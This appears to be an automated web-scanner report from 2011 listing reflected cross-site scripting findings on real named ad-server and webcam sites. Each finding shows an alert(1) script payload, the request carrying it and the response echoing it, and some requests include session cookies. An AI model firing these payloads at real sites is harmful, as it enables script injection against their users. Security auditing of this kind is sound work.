The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69287"><script>alert(1)</script>33cb0a82ffa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f04"><script>alert(1)</script>7d4d4d5514e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40281"-alert(1)-"380d67eabc7 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_72840281"-alert(1)-"380d67eabc7";
4.373. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1636403816@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 906d8"-alert(1)-"52b95d4418a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&906d8"-alert(1)-"52b95d4418a=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1272e"><script>alert(1)</script>8fdf9178846 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed86"><script>alert(1)</script>f1a30b8d9f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2e1"><script>alert(1)</script>1981e911952 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b0f4"-alert(1)-"1442e938870 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_7285b0f4"-alert(1)-"1442e938870";
4.378. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1670623313@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdfee"-alert(1)-"5a6dcd4bc89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:15 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&cdfee"-alert(1)-"5a6dcd4bc89=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ed0"><script>alert(1)</script>c14b682a958 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e164"><script>alert(1)</script>b13fbcb6a6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:42:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e9d9"><script>alert(1)</script>94f02ef6711 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:42:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_TF_CT_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e06"-alert(1)-"347645d577c was submitted in the USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2481 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_TF_CT_72848e06"-alert(1)-"347645d577c";
4.383. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1874556783@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40e2a"-alert(1)-"b1fcf879478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2484 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_TF_CT_728&40e2a"-alert(1)-"b1fcf879478=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a931d"><script>alert(1)</script>2e0f0c892ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7694"><script>alert(1)</script>7991189005e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1767"><script>alert(1)</script>cb7edce5f32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:42:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf8b8"-alert(1)-"1605863f2c2 was submitted in the USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300bf8b8"-alert(1)-"1605863f2c2";
4.388. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1902448725@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd125"-alert(1)-"6bc97e60a08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2489 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300&dd125"-alert(1)-"6bc97e60a08=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbff"><script>alert(1)</script>e5afcf36e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM8bbff"><script>alert(1)</script>e5afcf36e30/DLX/11678985058@x95?na_id= HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:45:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633d5"><script>alert(1)</script>bb101675df9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX633d5"><script>alert(1)</script>bb101675df9/11678985058@x95?na_id= HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:45:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 330 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e11"><script>alert(1)</script>6e135e30f8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/11678985058@x95f9e11"><script>alert(1)</script>6e135e30f8a?na_id= HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:45:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 322 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of the na_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c19f'-alert(1)-'e256993ce30 was submitted in the na_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2/B3DM/DLX/11678985058@x95?na_id=8c19f'-alert(1)-'e256993ce30 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:45:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2554 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
<script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }
var dlx_segment_list = 'na_id=8c19f'-alert(1)-'e256993ce30'; dlx_segment_list = dlx_segment_list.replace(/&/g,'|'); dlx_segment_list = dlx_segment_list.replace(/na_da=/g,'');
var dlx_segment_list_pairs=dlx_segment_list.split('|'); var ZAP_url='//t.mooki ...[SNIP]...
4.393. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/DLX/11678985058@x95
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91653'-alert(1)-'7447a25ebae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2/B3DM/DLX/11678985058@x95?na_id=&91653'-alert(1)-'7447a25ebae=1 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:45:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2556 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
<script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }
var dlx_segment_list = 'na_id=&91653'-alert(1)-'7447a25ebae=1'; dlx_segment_list = dlx_segment_list.replace(/&/g,'|'); dlx_segment_list = dlx_segment_list.replace(/na_da=/g,'');
var dlx_segment_list_pairs=dlx_segment_list.split('|'); var ZAP_url='//t.moo ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f1d"><script>alert(1)</script>19238ad28da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:44:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 330 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353bc"><script>alert(1)</script>1ee4471c2b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:44:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 755bc"><script>alert(1)</script>1f0f4c39874 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:44:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 323 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
4.397. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;"> ...[SNIP]...
4.398. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
